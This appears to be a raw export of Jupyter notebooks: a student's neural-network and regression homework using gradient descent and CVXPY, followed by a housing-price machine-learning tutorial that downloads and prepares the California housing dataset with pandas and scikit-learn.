"**For the 1st iteration**, similar steps have been conducted as the 1st iteration and:\n\nThe sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_1})=0$$\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_2})=54$$\nAverage the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_1})}{N}=0$$\n\n$$s_2=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_2})}{N}=0.675$$\nThe new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated, The value of $a_1$ and $a_2$ are both for all 6 observations:\n$$\nw_1=w_1-s_1=10-0=10,\\\\\nw_2=w_2-s_2=9.25-0.675=8.575\\\\\na_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1, \\quad i\\in [1,2,3,4,5,6]\\\\\na_2=w_2a_1+b=8.575*1+1=9.575\n$$",
"_____no_output_____"
],
[
"#### Code",
"_____no_output_____"
],
[
"Below is the code to estimate all weights using batch training, with the stopping criteria as change in loss function less than 0.0001. We can tell the iteration stopped at Iteration 62 and $w_1=10$ while $w_2=2.51$. We can tell that the $w_1$ hardly changes throughout the iterations. I did not show the first 60 iteration results since it makes the report wordy. \n\nOne thing we can tell is, comparing to Q5, the fitted $w_1$ and $w_2$ are almost the same even thought we added two more points to the training set. Also a plot has been given to see how well the 2-layer NN model fit to the 8 sample data points. As we see, they are not fitted well. ",
"_____no_output_____"
]
],
[
[
"w1, w2, a1, a2, gradient_1, gradient_2 = linear_activation_NN(C=1, lr=0.1, w1=10, w2=10, maxiteration=100)\n\n# plot the fit\nx = np.linspace(-4, 10, 100)\ny = w2 * (1 / (1 + np.exp(-(w1 * x + 1)))) + 1\n# plt.close('all')\nplt.plot(x, y, c='red', label='y = f(w2 * a1 + b)')\nplt.title('Fitted line using two-layer NN')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.xlim((-5, 8))\nplt.ylim((-2, 8))\nplt.xlabel('x')\nplt.ylabel('y')\nplt.show()",
"Break out of the loop and the iteration converge at Iteration= 62 \nThe value of loss is: 9.000281744024555 \nThe value of w1 is: 9.99977776141952 \nThe value of w2 is: 2.509835868561764\n"
]
],
[
[
"## Q7 Discussion",
"_____no_output_____"
],
[
"The detailed comments for Q1, Q2, Q3, Q5 and Q6 have been made in each section respectively. Here the convergence issue in Q4 and Q6 (the Single-layer NN) will be discussed. ",
"_____no_output_____"
],
[
"### Discussion of Convergence Issue",
"_____no_output_____"
],
[
"As mentioned in Q4, throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. From the code after running 30 iterations, the loss function value becomes larger and larger and won't be able to converge. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge. In below, the learning rate has been adjusted to 0.001 and the algorithm converged after 23 iterations with loss function value=`14.423`.\n\nThe fit has been plotted against the sample data points. ",
"_____no_output_____"
]
],
[
[
"ar = np.array([[1, 1, 1, 1, 1, 1], # intercept\n [1, 2, 3, 4, 5, 6], # x\n [1, 2, 3, 4, 5, 6]]) # y\n# Data preprocessing\nX_lp = ar[[0, 1], :].T # transpose the array before modeling\ny_lp = ar[2].T\n\n# Learning rate has been adjusted to 0.001\nw, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=100)\n\n# plot the fit\nx = np.linspace(0, 10, 100)\ny = 5 * w * x + 5\nplt.close('all')\nplt.plot(x, y, c='red', label='y = f(wx + b)')\nplt.title('Fitted line using single-layer NN')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.show()",
"Iteration= 0 , Loss value= 114465.5\nIteration= 1 , Loss value= 44127.76263888889\nIteration= 2 , Loss value= 17017.205223020348\nIteration= 3 , Loss value= 6567.873882921439\nIteration= 4 , Loss value= 2540.34601692255\nIteration= 5 , Loss value= 987.9997295433596\nIteration= 6 , Loss value= 389.672647492919\nIteration= 7 , Loss value= 159.05703032969262\nIteration= 8 , Loss value= 70.16992413801223\nIteration= 9 , Loss value= 35.90980878104183\nIteration= 10 , Loss value= 22.70479452687343\nIteration= 11 , Loss value= 17.61513269602634\nIteration= 12 , Loss value= 15.653403836536127\nIteration= 13 , Loss value= 14.897286780814902\nIteration= 14 , Loss value= 14.605853538556802\nIteration= 15 , Loss value= 14.493525250164922\nIteration= 16 , Loss value= 14.450230105536656\nIteration= 17 , Loss value= 14.433542683559361\nIteration= 18 , Loss value= 14.427110783293427\nIteration= 19 , Loss value= 14.424631710067663\nIteration= 20 , Loss value= 14.423676190889097\nIteration= 21 , Loss value= 14.42330790128349\nIteration= 22 , Loss value= 14.423165949937408\nBreak out of the loop and end at Iteration= 22 \nThe value of loss is: 14.423111237058341 \nThe value of w is: -0.03059554675295504\n"
]
],
[
[
"The same experiment has been conducted to the convergence issue in Q6 (single-layer NN). As mentioned in Q6, throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. From the code after running 30 iterations, the loss function value becomes larger and larger and won't be able to converge. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge. In below, the learning rate has been adjusted to 0.001 and the algorithm converged after 26 iterations with loss function value=`15.880`.\n\nThe fit has been plotted against the sample data points. ",
"_____no_output_____"
]
],
[
[
"ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1], # intercept\n [1, 2, 3, 4, 5, 6, 2, 3], # x\n [1, 2, 3, 4, 5, 6, 3, 4]]) # y\n# Data preprocessing\nX_lp = ar[[0, 1], :].T # transpose the array before modeling\ny_lp = ar[2].T\n\n# Learning rate has been adjusted to 0.001\nw, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=100)\n\n# plot the fit\nx = np.linspace(0, 10, 100)\ny = 5 * w * x + 5\nplt.close('all')\nplt.plot(x, y, c='red', label='y = f(wx + b)')\nplt.title('Fitted line using single-layer NN')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.show()",
"Iteration= 0 , Loss value= 131068.0\nIteration= 1 , Loss value= 59726.50207031248\nIteration= 2 , Loss value= 27221.532076098625\nIteration= 3 , Loss value= 12411.455122484942\nIteration= 4 , Loss value= 5663.613810494699\nIteration= 5 , Loss value= 2589.1286127191474\nIteration= 6 , Loss value= 1188.3162944826613\nIteration= 7 , Loss value= 550.0711819861626\nIteration= 8 , Loss value= 259.27075260494536\nIteration= 9 , Loss value= 126.77480696812822\nIteration= 10 , Loss value= 66.40634173735343\nIteration= 11 , Loss value= 38.900959766581664\nIteration= 12 , Loss value= 26.36882010614876\nIteration= 13 , Loss value= 20.658863973364035\nIteration= 14 , Loss value= 18.05726521036399\nIteration= 15 , Loss value= 16.87191177397209\nIteration= 16 , Loss value= 16.331835114516036\nIteration= 17 , Loss value= 16.085762686551366\nIteration= 18 , Loss value= 15.973645936559972\nIteration= 19 , Loss value= 15.922562742345136\nIteration= 20 , Loss value= 15.899287961980999\nIteration= 21 , Loss value= 15.888683390177597\nIteration= 22 , Loss value= 15.883851682149666\nIteration= 23 , Loss value= 15.881650235179443\nIteration= 24 , Loss value= 15.880647200903631\nIteration= 25 , Loss value= 15.880190193411718\nIteration= 26 , Loss value= 15.879981969373212\nBreak out of the loop and end at Iteration= 26 \nThe value of loss is: 15.87988709729567 \nThe value of w is: -0.04013747016418152\n"
]
],
[
[
"## Q8 Bonus Question",
"_____no_output_____"
],
[
"I attempt to add two points aiming at balancing out the effect of the two additional points added in Q6. The (2,1) and (3,2) have been added. \n\n**All four models (Simple Linear Regression, Fuzzy Linear Regression, Support Vector Regression and Single-layer NN) all lead to the same fitted line and they give the same predictions for x = 1, 2, 3, 4, 5, and 6. The prediction results are y = 1, 2, 3, 4, 5, and 6 respectively.**\n\nThe training observations look like the graph below. ",
"_____no_output_____"
]
],
[
[
"ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1], # intercept\n [1, 2, 3, 4, 5, 6, 2, 3, 2, 3], # x\n [1, 2, 3, 4, 5, 6, 3, 4, 1, 2]]) # y\n# plot the dot points\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.title('Visualization of training observations')\nplt.axis('scaled')\nplt.show()\nX_lp = ar[[0, 1], :].T # transpose the array before modeling\ny_lp = ar[2].T",
"_____no_output_____"
]
],
[
[
"### Simple Linear Regression",
"_____no_output_____"
],
[
"For Simple Linear Regression, the same model in Q1 is used. The estimated a is 1 and b is 0:",
"_____no_output_____"
]
],
[
[
"# Define and solve the CVXPY problem.\nbeta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total\ncost = cp.sum_squares(X_lp * beta - y_lp) # define cost function\nobj = cp.Minimize(cost) # define objective function\nprob = cp.Problem(obj)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe estimated of a (slope) is:\", beta.value[1],\n \"\\nThe estimate of b (intercept) is:\", beta.value[0])\n# Plot the fit\nx = np.linspace(0, 10, 100)\ny = beta.value[1] * x + beta.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = ax + b')\nplt.title('Fitted line using simple LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nThe optimal value of loss is: 4.000000000000197\n\nThe estimated of a (slope) is: 0.9999999992746318 \nThe estimate of b (intercept) is: 2.732524248538759e-09\n"
]
],
[
[
"### Fuzzy Linear Regression",
"_____no_output_____"
],
[
"For Fuzzy Linear Regression, the same model has been used from Q6. The estimated $A0=0$ with spread=2 and $A1=1$ with spread=0.",
"_____no_output_____"
]
],
[
[
"# Define threshold h (it has same meaning as the alpha in alpha-cut). Higher the h, wider the spread.\nh = 0.5\n# Define and solve the CVXPY problem.\nc = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1\nalpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1\ncost = cp.sum(X_lp * c) # define cost function\nobj = cp.Minimize(cost) # define objective function\nconstraints = [c >= 0,\n y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp\n -y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]\n\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe center of A1 (slope) is:\", alpha.value[1],\n \"\\nThe spread of A1 (slope) is:\", c.value[1],\n \"\\nThe center of A0 (intercept) is:\", alpha.value[0],\n \"\\nThe spread of A0 (intercept) is:\", c.value[0])\n\n# Plot the FR fit\nx = np.linspace(0, 10, 100)\ny = alpha.value[1] * x + alpha.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = A1x + A0')\ny = (alpha.value[1] + c.value[1]) * x + alpha.value[0] + c.value[0]\nplt.plot(x, y, '--g', label='Fuzzy Spread')\ny = (alpha.value[1] - c.value[1]) * x + alpha.value[0] - c.value[0]\nplt.plot(x, y, '--g')\nplt.title('Fitted line using Fuzzy LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nThe optimal value of loss is: 20.0\n\nThe center of A1 (slope) is: 1.0 \nThe spread of A1 (slope) is: 0.0 \nThe center of A0 (intercept) is: 0.0 \nThe spread of A0 (intercept) is: 2.0\n"
]
],
[
[
"### Support Vector Regression",
"_____no_output_____"
],
[
"For Support Vector Regression, the same model has been used from Q6 with $\\epsilon$ been set to 1. The estimated $w$ is 1 and $b$ is 0. ",
"_____no_output_____"
]
],
[
[
"epsilon = 1\nbw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w\ncost = 1 / 2 * bw[1] ** 2\nobj = cp.Minimize(cost)\nconstraints = [\n y_lp <= X_lp * bw + epsilon,\n -y_lp <= -(X_lp * bw) + epsilon]\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nSVR result:\")\nprint(\"The estimate of w is:\", bw.value[1],\n \"\\nThe estimate of b is:\", bw.value[0], )\n\n# Plot the SVR fit\nupper = X_lp[:, 1] * bw.value[1] + bw.value[0] + epsilon # upper bound of the margin\nlower = X_lp[:, 1] * bw.value[1] + bw.value[0] - epsilon # lower bound of the margin\n\nx = np.linspace(.5, 6, 100)\ny = bw.value[1] * x + bw.value[0]\nplt.plot(x, y, c='red', label='y = wx + b')\nx = [[min(X_lp[:, 1]), max(X_lp[:, 1])]]\ny = [[min(lower), max(lower)]]\nfor i in range(len(x)):\n plt.plot(x[i], y[i], '--g')\ny = [[min(upper), max(upper)]]\nfor i in range(len(x)):\n plt.plot(x[i], y[i], '--g', label='margin')\nplt.title('Fitted line using SVR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nSVR result:\nThe estimate of w is: 1.0 \nThe estimate of b is: -0.0\n"
]
],
[
[
"### Single-layer NN",
"_____no_output_____"
],
[
"For single-layer NN, I use the same structure in Q4 ***with the bias set to 0***. As discussed in Q7, I set the learning rate=0.001 and the algorithm converge at iteration 30. The estimated $w$ is 0.2. The fitted line with the training sample points are plotted.",
"_____no_output_____"
]
],
[
[
"def single_layer_NN(lr, w, maxiteration, bias=1):\n \"\"\"lr - learning rate\\n\n w - initial value of w\\n\n maxiteration - define # of max iteration\\n\n bias - default is 1 \"\"\"\n E0 = sum(0.5 * np.power((y_lp - 5 * (w * X_lp[:, 1] + bias)), 2)) # initialize Loss, before 1st iteration\n for i in range(maxiteration):\n if i > 0: # Starting 2nd iteration, E1 value give to E0\n E0 = E1 # Loss before iteration\n print(\"Iteration=\", i, \",\", \"Loss value=\", E0)\n gradient = np.mean((5 * (w * X_lp[:, 1] + bias) - y_lp) * 5 * X_lp[:, 1]) # calculate gradient\n step = gradient * lr # calculate step size\n w = w - step # refresh the weight\n E1 = sum(0.5 * np.power((5 * (w * X_lp[:, 1] + bias) - y_lp), 2)) # Loss after iteration\n a = 5 * (w * X_lp[:, 1] + 1) # the refreshed output\n\n if abs(E0 - E1) <= 0.0001:\n print('Break out of the loop and end at Iteration=', i,\n '\\nThe value of loss is:', E1,\n '\\nThe value of w is:', w)\n break\n return w, a, gradient\n\nw, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=40, bias=0)\n\n# plot the NN fit\nx = np.linspace(0, 10, 100)\ny = 5 * w * x + 0\nplt.close('all')\nplt.plot(x, y, c='red', label='y = f(wx + b)')\nplt.title('Fitted line using single-layer NN')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"Iteration= 0 , Loss value= 140460.5\nIteration= 1 , Loss value= 70309.380040625\nIteration= 2 , Loss value= 35194.79850046009\nIteration= 3 , Loss value= 17617.975244395926\nIteration= 4 , Loss value= 8819.78650842766\nIteration= 5 , Loss value= 4415.798147959143\nIteration= 6 , Loss value= 2211.3542491993735\nIteration= 7 , Loss value= 1107.9060779008041\nIteration= 8 , Loss value= 555.5681992062342\nIteration= 9 , Loss value= 279.0920219139255\nIteration= 10 , Loss value= 140.70014339415238\nIteration= 11 , Loss value= 71.42722365183917\nIteration= 12 , Loss value= 36.75223071907594\nIteration= 13 , Loss value= 19.39544628787546\nIteration= 14 , Loss value= 10.707399360935359\nIteration= 15 , Loss value= 6.358543171362202\nIteration= 16 , Loss value= 4.181696025320171\nIteration= 17 , Loss value= 3.092061581074171\nIteration= 18 , Loss value= 2.546638249791558\nIteration= 19 , Loss value= 2.273623192422225\nIteration= 20 , Loss value= 2.136963799111898\nIteration= 21 , Loss value= 2.0685580856692054\nIteration= 22 , Loss value= 2.0343171782697556\nIteration= 23 , Loss value= 2.017177678065291\nIteration= 24 , Loss value= 2.008598394116069\nIteration= 25 , Loss value= 2.0043039799147615\nIteration= 26 , Loss value= 2.0021543840462086\nIteration= 27 , Loss value= 2.00107839039923\nIteration= 28 , Loss value= 2.0005397950542743\nIteration= 29 , Loss value= 2.000270197788136\nIteration= 30 , Loss value= 2.0001352491915876\nBreak out of the loop and end at Iteration= 30 \nThe value of loss is: 2.000067699828157 \nThe value of w is: 0.20021515222701822\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
]
] |
cb53c8398a007ae0af676eaa581f885a8aab665e | 605,387 | ipynb | Jupyter Notebook | Housing Predi/house_pre.ipynb | abideen305/myML-model | fceb79b51819124c5499647930bb717583976613 | [
"MIT"
] | 1 | 2020-07-03T00:17:50.000Z | 2020-07-03T00:17:50.000Z | Housing Predi/house_pre.ipynb | abideen305/myML-model | fceb79b51819124c5499647930bb717583976613 | [
"MIT"
] | null | null | null | Housing Predi/house_pre.ipynb | abideen305/myML-model | fceb79b51819124c5499647930bb717583976613 | [
"MIT"
] | 1 | 2020-07-11T21:26:10.000Z | 2020-07-11T21:26:10.000Z | 232.841154 | 305,380 | 0.89996 | [
[
[
"# fetching data online\n\nimport os\nimport tarfile\nfrom six.moves import urllib",
"_____no_output_____"
],
[
"DOWNLOAD_ROOT = \"https://raw.githubusercontent.com/ageron/handson-ml2/master/\"\nHOUSING_PATH = os.path.join(\"datasets\", \"housing\")\nHOUSING_URL = DOWNLOAD_ROOT + \"datasets/housing/housing.tgz\"\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n if not os.path.isdir(housing_path):\n os.makedirs(housing_path)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()",
"_____no_output_____"
],
[
"fetch_housing_data()",
"_____no_output_____"
],
[
"import pandas as pd\n\ndef load_housing_data(housing_path=HOUSING_PATH):\n csv_path = os.path.join(housing_path, \"housing.csv\")\n return pd.read_csv(csv_path)\n ",
"_____no_output_____"
],
[
"housing = load_housing_data()\nhousing.head()",
"_____no_output_____"
],
[
"housing.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 20640 entries, 0 to 20639\nData columns (total 10 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 longitude 20640 non-null float64\n 1 latitude 20640 non-null float64\n 2 housing_median_age 20640 non-null float64\n 3 total_rooms 20640 non-null float64\n 4 total_bedrooms 20433 non-null float64\n 5 population 20640 non-null float64\n 6 households 20640 non-null float64\n 7 median_income 20640 non-null float64\n 8 median_house_value 20640 non-null float64\n 9 ocean_proximity 20640 non-null object \ndtypes: float64(9), object(1)\nmemory usage: 1.6+ MB\n"
],
[
"housing[\"ocean_proximity\"].value_counts()",
"_____no_output_____"
],
[
"housing.describe()",
"_____no_output_____"
],
[
"%matplotlib inline\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"housing.hist(bins=50, figsize=(20,15))\nplt.show()",
"_____no_output_____"
],
[
"import numpy as np\ndef split_train_test (data, test_ratio):\n shuffled_indices = np.random.permutation(len(data))\n test_set_size = int(len(data) * test_ratio)\n test_indices = shuffled_indices[:test_set_size]\n train_indices = shuffled_indices[test_set_size:]\n return data.iloc[train_indices], data.iloc[test_indices]",
"_____no_output_____"
],
[
"train_set, test_set = split_train_test(housing, 0.2)",
"_____no_output_____"
],
[
"print(len(train_set))\nprint(len(test_set))",
"16512\n4128\n"
],
[
"from zlib import crc32\ndef test_set_check(identifier, test_ratio):\n return crc32(np.int64(identifier)) & 0xffffffff < test_ratio * 2**32\ndef split_train_test_by_id(data, test_ratio, id_column):\n ids = data[id_column]\n in_test_set = ids.apply(lambda id_: test_set_check(id_, test_ratio))\n return data.loc[~in_test_set], data.loc[in_test_set]\n",
"_____no_output_____"
],
[
"housing_with_id = housing.reset_index() # adds an `index` column\ntrain_set, test_set = split_train_test_by_id(housing_with_id, 0.2, \"index\")",
"_____no_output_____"
],
[
"housing_with_id[\"id\"] = housing[\"longitude\"] * 1000 + housing[\"latitude\"]\ntrain_set, test_set = split_train_test_by_id(housing_with_id, 0.2, \"id\")",
"_____no_output_____"
],
[
"#splitting using sciktlearn\nfrom sklearn.model_selection import train_test_split\ntrain_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)",
"_____no_output_____"
],
[
"housing[\"income_cat\"] = pd.cut(housing[\"median_income\"],\n bins=[0., 1.5, 3.0, 4.5, 6., np.inf],\n labels=[1, 2, 3, 4, 5])",
"_____no_output_____"
],
[
"housing['income_cat'].hist()\nplt.show()",
"_____no_output_____"
],
[
"#stratifield splitting\nfrom sklearn.model_selection import StratifiedShuffleSplit\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\nfor train_index, test_index in split.split(housing, housing[\"income_cat\"]):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]",
"_____no_output_____"
],
[
"strat_test_set[\"income_cat\"].value_counts() / len(strat_test_set)",
"_____no_output_____"
],
[
"for set_ in (strat_train_set, strat_test_set):\n set_.drop(\"income_cat\", axis=1, inplace=True)",
"_____no_output_____"
],
[
"housing = strat_train_set.copy()",
"_____no_output_____"
],
[
"housing.plot(kind=\"scatter\", alpha =0.1, x=\"longitude\", y=\"latitude\")\nplt.show()",
"_____no_output_____"
],
[
"corr_matrix = housing.corr()\ncorr_matrix",
"_____no_output_____"
],
[
"corr_matrix['median_house_value'].sort_values(ascending=False)",
"_____no_output_____"
],
[
"plt.subplot()\nplt.plot(corr_matrix['median_house_value'], color ='red')\nplt.show()",
"_____no_output_____"
],
[
"#using pandas's scatter matrix to check for correlation\nfrom pandas.plotting import scatter_matrix\n",
"_____no_output_____"
],
[
"attributes = [\"median_house_value\", \"median_income\", \"total_rooms\", \"housing_median_age\"]\nscatter_matrix(housing[attributes], figsize=(12,8))\nplt.show()",
"_____no_output_____"
],
[
"housing.plot(kind='scatter', x='median_income', y=\"median_house_value\", alpha=0.1)\n\nplt.show()",
"_____no_output_____"
],
[
"housing[\"rooms_per_household\"] = housing[\"total_rooms\"] / housing[\"households\"]\nhousing[\"population_per_household\"] = housing[\"population\"] / housing[\"households\"]\nhousing[\"bedrooms_per_room\"] = housing[\"total_bedrooms\"] / housing[\"total_rooms\"]",
"_____no_output_____"
],
[
"corr_matrix = housing.corr()",
"_____no_output_____"
],
[
"corr_matrix[\"median_house_value\"].sort_values(ascending = False)",
"_____no_output_____"
],
[
"#Prepare the Data for Machine Learning Algorithms",
"_____no_output_____"
],
[
"housing = strat_train_set.drop(\"median_house_value\", axis=1)\nhousing_labels = strat_train_set[\"median_house_value\"].copy()\n",
"_____no_output_____"
],
[
"median = housing[\"total_bedrooms\"].median()",
"_____no_output_____"
]
],
[
[
"## Data Cleaning\n\n- Most Machine Learning algorithms cannot work with missing features, so let’s create a few functions to take care of them. \nYou noticed earlier that the total_bedrooms\nattribute has some missing values, so let’s fix this. You have three options:\n- Get rid of the corresponding districts.\n- Get rid of the whole attribute.\n- Set the values to some value (zero, the mean, the median, etc.).\nYou can accomplish these easily using DataFrame’s dropna(), drop(), and fillna()\nmethods.\n\n\nIf you choose option 3, you should compute the median value on the training set, and\nuse it to fill the missing values in the training set, but also don’t forget to save the\nmedian value that you have computed. You will need it later to replace missing values\nin the test set when you want to evaluate your system, and also once the system goes\nlive to replace missing values in new data.\nScikit-Learn provides a handy class to take care of missing values: SimpleImputer.\nHere is how to use it. First, you need to create a SimpleImputer instance, specifying\nthat you want to replace each attribute’s missing values with the median of that\nattribute.\n\nHowever, I won't be dealing with sklearn now because we are yet to treat the library\n",
"_____no_output_____"
]
],
[
[
"housing.dropna(subset=[\"total_bedrooms\"]) # option 1\nhousing.drop(\"total_bedrooms\", axis=1) # option 2\nmedian = housing[\"total_bedrooms\"].median() # option 3\nhousing[\"total_bedrooms\"].fillna(median, inplace=True)",
"_____no_output_____"
],
[
"from sklearn.impute import SimpleImputer",
"_____no_output_____"
],
[
"housing[\"total_bedrooms\"].fillna(median, inplace=True)",
"_____no_output_____"
],
[
"imputer = SimpleImputer(strategy=\"median\")\n",
"_____no_output_____"
],
[
"#I made mistake in this code. I wrote simpler instead of simple\n\n# imputer = SimplerImputer(strategy= \"median\")",
"_____no_output_____"
],
[
"#Since the median can only be computed on numerical attributes, we need to create a\n#copy of the data without the text attribute ocean_proximity:\nhousing_num = housing.drop(\"ocean_proximity\", axis=1)",
"_____no_output_____"
],
[
"print(imputer.fit(housing_num))",
"SimpleImputer(strategy='median')\n"
],
[
"imputer",
"_____no_output_____"
],
[
"#I could have just treat only total_bedrooms attribute that has missing values rather than everything. But we can't be so sure of tomorrow's data\n#so let's apply it to everywhere\n\nimputer.statistics_",
"_____no_output_____"
],
[
"housing_num.median().values",
"_____no_output_____"
],
[
"#transform the values\n\nX = imputer.transform(housing_num)",
"_____no_output_____"
],
[
"housing_tr = pd.DataFrame(X, columns=housing_num.columns)",
"_____no_output_____"
],
[
"housing_tr",
"_____no_output_____"
],
[
"#fit() and transform() what about fit_transform()?\n\n#fit_transform() is saying fit then transform. Fit_transform() method sometimes run faster.",
"_____no_output_____"
]
],
[
[
"## Handling Text and Categorical Attributes\n",
"_____no_output_____"
]
],
[
[
"# let's us treat ocean_proximity attributes ",
"_____no_output_____"
],
[
"housing_cat = housing[[\"ocean_proximity\"]]",
"_____no_output_____"
],
[
"housing_cat.head(15)",
"_____no_output_____"
],
[
"#check for the value counts\nhousing_cat.value_counts(sort=True)",
"_____no_output_____"
]
],
[
[
"# to convert text attribute to number because machine learning algorithms tends to work better with numbers, we use\n\n- oneht encoding\n- Scikit-Learn’s OrdinalEncoder class\n- etc",
"_____no_output_____"
]
],
[
[
"from sklearn.preprocessing import OrdinalEncoder",
"_____no_output_____"
],
[
"ordinal_encoder = OrdinalEncoder()",
"_____no_output_____"
],
[
"ordinal_encoder",
"_____no_output_____"
],
[
"housing_cat_encoded = ordinal_encoder.fit_transform(housing_cat)",
"_____no_output_____"
],
[
"housing_cat_encoded",
"_____no_output_____"
],
[
"ordinal_encoder.categories_",
"_____no_output_____"
],
[
"_",
"_____no_output_____"
]
],
[
[
"## Underscore (_) in Python\nDifficulty Level : Medium\nLast Updated : 22 Nov, 2020\nFollowing are different places where _ is used in Python:\n\nSingle Underscore:\nIn Interpreter\nAfter a name\nBefore a name\nDouble Underscore:\n__leading_double_underscore\n__before_after__\nSingle Underscore\n\nIn Interpreter:\n_ returns the value of last executed expression value in Python Prompt/Interpreter\n\nFor ignoring values:\nMultiple time we do not want return values at that time assign those values to Underscore. It used as throwaway variable.\n\n# Ignore a value of specific location/index\nfor _ in range(10)\n print (\"Test\")\n \n# Ignore a value when unpacking\na,b,_,_ = my_method(var1)\nAfter a name\nPython has their by default keywords which we can not use as the variable name. To avoid such conflict between python keyword and variable we use underscore after name\n\n- snake_case vs camelCase vs PascalCase\n",
"_____no_output_____"
]
],
[
[
"# One hot encoding\n\n#Our ML algorithm from previous result, 0.,1.,..4. can think 0.1 and 0.2 are close\n# to solve this problem, we do dummy variable. To achieve that, scikit- learn provides us with One hot encoding\n ",
"_____no_output_____"
],
[
"from sklearn.preprocessing import OneHotEncoder",
"_____no_output_____"
],
[
"cat_encoder = OneHotEncoder()",
"_____no_output_____"
],
[
"housing_cat_1hot = cat_encoder.fit_transform(housing_cat)",
"_____no_output_____"
],
[
"housing_cat_1hot",
"_____no_output_____"
],
[
"# Using up tons of memory mostly to store zeros\n# would be very wasteful, so instead a sparse matrix only stores the location of the non‐\n# 70 | Chapter 2: End-to-End Machine Learning Project\n# 21 See SciPy’s documentation for more details.\n# zero elements. You can use it mostly like a normal 2D array,21 but if you really want to\n# convert it to a (dense) NumPy array, just call the toarray() method:\n",
